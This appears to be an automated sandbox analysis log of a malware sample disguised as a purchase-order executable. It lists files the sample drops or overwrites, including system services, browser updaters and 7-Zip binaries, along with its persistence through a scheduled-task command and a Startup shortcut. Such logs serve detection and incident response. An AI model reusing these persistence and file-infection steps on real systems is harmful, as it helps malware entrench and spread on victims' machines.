Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp"

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

Code function: 8_2_02BFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

8_2_02BFCBD0

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Writes data at the end of the disk (often used by bootkits to hide malicious code)

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Users\user\AppData\Roaming\zeXKjViL.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Users\user\AppData\Roaming\zeXKjViL.exe:Zone.Identifier offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Users\user\AppData\Local\Temp\tmp29D3.tmp offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_2024_056209_MQ04865_ENQ_1045.exe.log offset: 0	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbjhbjfb.ggs.ps1 offset: 0	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvfd5szs.lt0.psm1 offset: 0	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5w01d5uy.1rp.ps1 offset: 0	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tv43awin.xsd.psm1 offset: 0	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 0	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 64	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 104	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 262	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 1168	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 1172	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_he4vwakp.5ku.ps1 offset: 0	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gh1bt3rc.i3w.psm1 offset: 0	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zccguk4f.xmq.ps1 offset: 0	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wchwsqu1.pcz.psm1 offset: 0	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 0	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 64	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 104	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 262	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 1168	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 1172	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 162304	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735820	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 737280	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1285120	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1286144	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1289427	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735744	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 31704	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Users\user\AppData\Roaming\a5f0bea56967b89b.bin offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\alg.exe offset: 95744	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\alg.exe offset: 669260	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\alg.exe offset: 672768	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\alg.exe offset: 1220608	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\alg.exe offset: 1221632	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\alg.exe offset: 1224840	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\alg.exe offset: 669184	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\alg.exe offset: 53125	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\AppVClient.exe offset: 767488	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1341004	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1344512	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1347720	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1340928	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\AppVClient.exe offset: 409168	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 94208	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 667724	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 671232	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1219072	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1220096	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1223304	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 667648	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 50277	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\FXSSVC.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\FXSSVC.exe offset: 663552	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\FXSSVC.exe offset: 1237068	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\FXSSVC.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\FXSSVC.exe offset: 1238528	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\FXSSVC.exe offset: 1241736	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\FXSSVC.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\FXSSVC.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\FXSSVC.exe offset: 1236992	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\FXSSVC.exe offset: 516101	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Windows\System32\FXSSVC.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File written: C:\Users\user\AppData\Local\Temp\Microsofts.exe offset: 0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	File written: C:\Users\user\AppData\Local\Temp\tmp6E4E.tmp offset: 0
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	File written: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zeXKjViL.exe.log offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Windows\System32\config\systemprofile\AppData\Roaming\a5f0bea56967b89b.bin offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 1792000
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 2365516
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 2365440
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 777420
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 1776128
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349644
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349568
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 677164
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 228352
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801868
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801792
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 43297
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 557056
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 1130572
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 1130496
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 382726
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 952832
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 1526348
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 1526272
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 614020
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 700416
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 1273932
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 1273856
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 464916
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 14848
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 588364
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 588288
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 5610
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 5630464
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203980
